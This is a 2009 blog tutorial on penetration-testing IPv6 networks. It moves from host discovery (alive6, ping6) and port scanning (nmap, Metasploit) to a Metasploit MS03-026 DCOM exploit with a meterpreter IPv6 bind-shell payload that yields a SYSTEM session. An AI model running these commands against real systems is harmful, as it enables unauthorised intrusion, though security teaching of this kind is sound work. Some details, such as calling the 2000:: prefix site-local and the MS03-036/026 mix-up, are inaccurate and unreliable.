Tuesday, August 11, 2009

Exploiting IPv6 Network Stack: A Pen-tester Approach

The Next-generation protocol, IP version 6, has came out nearly 11 years ago but never been used or practiced in the real world network envrionment. This lack of adoption of technology has not only left many machines in corporate networks without IPv6 implementation but also put a negative affect on networking and operating system vendors. On the other side, due to its fast growth and complexity of implementation in various firewalls and intrusion detection/prevention appliances has revealed the attack surface, as they cannot block malicious IPv6 traffic. The main purpose of this article is to demonstrate the process through which a penetration tester can assess the security of IPv6 enabled environment.

Addressing Scheme
The representation of IPv6 has changed alot from IPv4 addressing scheme. IPv6 network address consists of 128 bits or 16 bytes as a pair of four hex-digits separated by colons. This gives more wider address space and flexibility to segment the addresses accordingly. Lets take some examples to understand the inner workings of IPv6 addressing.

::1 represents loopback or localhost address (IPv4 equivalent
::0 or :: represents ANY IPv6 address
fe80:: prefix represents link-local address
2000:: prefix represents site-local address

Attack Surface
Usually all the IPv6 network nodes are configured with at least one link-local address (fe80::). While performing this automatic configuration, a router discovery request will be sent to all IPv6 enabled routers on their broadcast addresses. Now, if any router respond back, the node will select that site-local address (2000::) for its interface. This scenario introduces a threat where there is no active IPv6 routers and the attacker takes advantage to reply with rogue address. The risk factor of such attack is higher and may cause serious damage and data leakage problems for the organization. Using the mentioned scenario, I will demonstrate the real-world attack on IPv6 network from penetration testing perspective.

1. IPv6 Network Configuration
To validate if your system is configured with IPv6 address at particular interface, execute the following command:

# ifconfig eth0 | grep inet6
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link

2. Discovery and Scanning
IPv6 design introduces a new set of protocol for network discovery. It consists of ICMPv6 Neighbour Discovery and Neighbour Solicitation protocols. In order to enumerate the network hosts, we can use the "IPv6 Attack Toolkit" published by Van Hauser. This task is accomplished using "alive6" program included in the package.

# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
Found 2 systems alive

The combination of "ip" and "ping6" command can also accumulate in local IPv6 node discovery process.

# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
# ip neigh | grep ^fe80
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE

3. Service Enumeration
In order to find the open ports running specific services on target IPv6 machine. An attacker can simply use "NMap" as follows:

# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
22/tcp open ssh

The similar task can be done through Metasploit Framework's TCP port scanner which includes a complete support for IPv6 addresses.

# msfconsole
msf> use auxiliary/discovery/portscan/tcp
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
msf auxiliary(tcp) > set PORTSTART 1
msf auxiliary(tcp) > set PORTSTOP 10000
msf auxiliary(tcp) > run
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
[*] Auxiliary module execution completed

4. Exploitation
To move towards penetration stage, it is vital to determine all set of vulnerable services running on the target machine. For instance, consider the following NMap results from scanning the IPv6 Windows interface.

# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1032/tcp open iad3
1034/tcp open unknown
1035/tcp open unknown
1036/tcp open unknown
1755/tcp open wms
9464/tcp open unknown

As we know that Metasploit Framework supports IPv6 sockets. This allow us to use almost any auxiliary and exploit modules against IPv6 hosts same as IPv4. For the purpose of demonstration, I have used MS03-036 (Blaster) exploit to penetrate DCERPC endpoint mapper service (port 135) and get a root shell.

msf> use windows/exploit/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
msf exploit(ms03_026_dcom) > set LPORT 4444
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
The Metasploit Framework - http://metasploit.com
nmap - http://nmap.org/
IPv6 Site - http://www.ipv6.org/
RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt